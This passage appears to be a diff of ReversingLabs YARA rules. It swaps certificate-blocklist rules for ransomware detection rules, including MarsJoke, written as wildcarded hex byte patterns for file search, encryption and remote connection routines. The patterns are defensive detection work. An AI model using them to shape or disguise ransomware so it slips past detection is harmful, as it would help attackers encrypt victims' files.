+            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55
+            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ??
+            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 55 ?? 03 CA 89 85 ?? ?? ?? ??
+            83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83
+            7F ?? ?? 72 ?? 8B 3F 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
+            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
+            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 83 7D ?? ?? 8D 4D ?? 66 89 85 ?? ?? ?? ?? 0F 43 4D ?? 8B 45 ?? 03 C1 C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B F0 83 7E ?? ?? 72 ?? 8B 36 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
+            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 50 6A ?? 68 ?? ?? ?? ?? 57 8B 3D ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? FF D7 89 85 ?? ?? ?? ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF
+            D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C9 BA
+        }
+		$encrypt_files_p2 = {
+            8D 40 ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ??
+            ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 03 CA 89 85 ?? ?? ?? ?? 83 3D ?? ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 51 50 8B CE E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 83 C4 ?? 33 C9 68 ?? ?? ?? ?? 6A ?? 56 66 89 0C 46 8D 85 ?? ?? ??
+            ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 86 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
+            8D 45 ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF 33 F6 57 FF B5 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+		$encrypt_files_p3 = {
+            8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F8 8D 85 ?? ?? ?? ?? 3B
+            BD ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 0F 44 F1 50 6A ?? 56 6A ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
+            5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 33 C0 89
+            85 ?? ?? ?? ?? 38 47 ?? 0F 85 ?? ?? ?? ?? 8B 07 8B 08 8D 85 ?? ?? ?? ?? 50 8D 49 ??
+            E8 ?? ?? ?? ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 8B 07 8B 08 8D 85 ?? ??
+            ?? ?? 50 8D 49 ?? E8 ?? ?? ?? ?? 83 38 ?? 0F 84 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ??
+            8B 30 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 46 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
+            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
+            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 07 8B
+            30 8B 46 ?? 8B 00 85 C0 74 ?? 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 83 C4 ?? 66 83 38 ?? 75 ?? 8B 46 ?? FF 30 FF 15 ?? ?? ?? ?? 8B 46 ?? 83 C4
+            ?? C7 00 ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
+            4E ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 81 7F ?? ?? ?? ?? ?? 8B 37 8B 36 75 ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 8B 46 ?? 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D 4F ?? 50 E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACHNA PLITKA, TOV" and pe.signatures [ i ] . serial == "69:22:bb:5d:e8:8e:41:27:e1:ac:69:69:e6:a1:99:f5" and 1552692162 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_73065Efa163B7901Fa1Ccb0A54E80540 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Marsjoke : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MarsJoke ransomware."
 		author = "ReversingLabs"
-		id = "949f55a9-7aa0-50de-bb81-fed5d27c3d24"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8164c586-f548-5414-9df8-61e0c51cbe29"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3270-L3286"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e420c37c04aa676c266a4c2c228063239815c173a83c39d426c5a674648f1934"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.MarsJoke.yara#L1-L157"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "298b2fd99793a15b3537853289e1337648d3fa84f12038e6f6831741404b7c5c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MarsJoke"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOVA CONSULTANCY LTD" and pe.signatures [ i ] . serial == "73:06:5e:fa:16:3b:79:01:fa:1c:cb:0a:54:e8:05:40" and 1548115200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4842Afad00904Ed8C98811E652Ccb3B7 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "f09723aa-85a6-5d96-a71e-94f0e0a0f23c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3288-L3304"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b5c7c13369c7b89f1ea5474de3644a12bf6412cb3fa8ade5b66de280fb10cbf"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_and_encrypt_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45
+            ?? 53 56 89 44 24 ?? 8B 45 ?? 57 89 44 24 ?? 8B 45 ?? BE ?? ?? ?? ?? 33 DB 56 89 44
+            24 ?? 8D 84 24 ?? ?? ?? ?? 8B F9 53 50 89 7C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 56 8D 84 24 ?? ?? ?? ?? 53 50 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 57 8D 4C 24 ?? 88 5C 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 38 5C 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 59 BE ?? ?? ??
+            ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 FF
+            74 24 ?? FF D7 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 84 C0 8D 84 24 ?? ?? ?? ?? 75 ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? E9 ?? ?? ?? ??
+            6A ?? 50 FF D7 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E9 ?? ?? ?? ?? 8D 4C
+            24 ?? 51 50 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ??
+            ?? 89 5C 24 ?? 33 DB 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 54 24
+            ?? 89 4C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 8D 84 24
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 56 8D 84 24 ?? ?? ?? ?? 50 FF
+            D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 56 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ??
+            ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 6A ?? 59 33 C0 66 89 9C 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB 6A ?? FF
+            74 24 ?? 66 AB 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
+            ?? 57 53 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 0B 44 24 ?? 74 ?? 83 44
+            24 ?? ?? 11 5C 24 ?? EB ?? 89 7C 24 ?? 89 5C 24 ?? BF ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
+            59 50 57 8B 7C 24 ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 47 ?? 8B 44 24 ?? 53
+            89 47 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 57 FF 74 24 ?? C7 47 ?? ?? ?? ?? ?? 88 5C 24
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? 3B FB 89
+            5C 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 8B 74 24 ?? 83 EE ??
+            1B FB 89 74 24 ?? 89 7C 24 ?? 89 5C 24 ?? 33 C0 EB ?? 8B 7C 24 ?? 8B 74 24 ?? 39 74
+            24 ?? 75 ?? 3B C7 75 ?? 8B 44 24 ?? 89 44 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74
+            24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 58 39 44 24 ?? 73 ?? 89 44 24 ?? 39 74 24
+            ?? 75 ?? 33 C0 3B C7 75 ?? 39 5C 24 ?? 7C ?? 7F ?? 83 7C 24 ?? ?? 76 ?? 8B 44 24 ??
+            83 E0 ?? 74 ?? 8B 4C 24 ?? 2B C8 03 C9 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 74 24 ??
+            53 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
+            ?? 50 81 EC ?? ?? ?? ?? 6A ?? 59 8B FC FF B4 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? FF
+            B4 24 ?? ?? ?? ?? F3 A5 8B B4 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ??
+            53 8D 44 24 ?? 50 FF 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 68 ?? ?? ?? ??
+            53 56 74 ?? FF 15 ?? ?? ?? ?? FF 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 33 C0 3B 44 24 ??
+            0F 8C ?? ?? ?? ?? 7F ?? 8B 4C 24 ?? 3B 4C 24 ?? 0F 82 ?? ?? ?? ?? EB ?? C6 44 24 ??
+            ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 74 24 ?? FF 15 ?? ?? ?? ??
+            FF 74 24 ?? 8B 3D ?? ?? ?? ?? FF D7 FF 74 24 ?? FF D7 56 8D 84 24 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 38 5C 24 ?? 8D 84 24
+            ?? ?? ?? ?? 75 ?? 6A ?? FF 74 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 FF 74 24 ?? 68 ?? ??
+            ?? ?? 75 ?? E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF D6 EB ?? E8 ?? ?? ?? ??
+            59 59 B0 ?? EB ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 32 C0 8B 8C 24 ?? ?? ?? ??
+            5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_2 = {
+            55 8D 6C 24 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ??
+            53 56 57 BE ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 56 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ??
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ??
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? 57
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ??
+            6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C3
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50
+            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 59 59 5F 5E 5B 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            59 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B 85 ??
+            ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 83 C5 ?? C9 C3
+        }
+		$remote_connection_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85
+            ?? ?? ?? ?? 50 8B F9 8B F2 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 33 DB 53 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 89 85 ?? ?? ?? ?? 66 C7 85
+            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
+            88 1F 50 88 1E 66 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 38 9D ?? ?? ??
+            ?? 59 59 75 ?? 68 ?? ?? ?? ?? C6 07 ?? E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 33 F6 BB ?? ?? ?? ??
+            56 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 53 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ??
+            46 83 FE ?? 59 59 7C ?? EB ?? 53 E8 ?? ?? ?? ?? 59 83 BD ?? ?? ?? ?? ?? 7C ?? C6 07
+            ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 F6 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 66
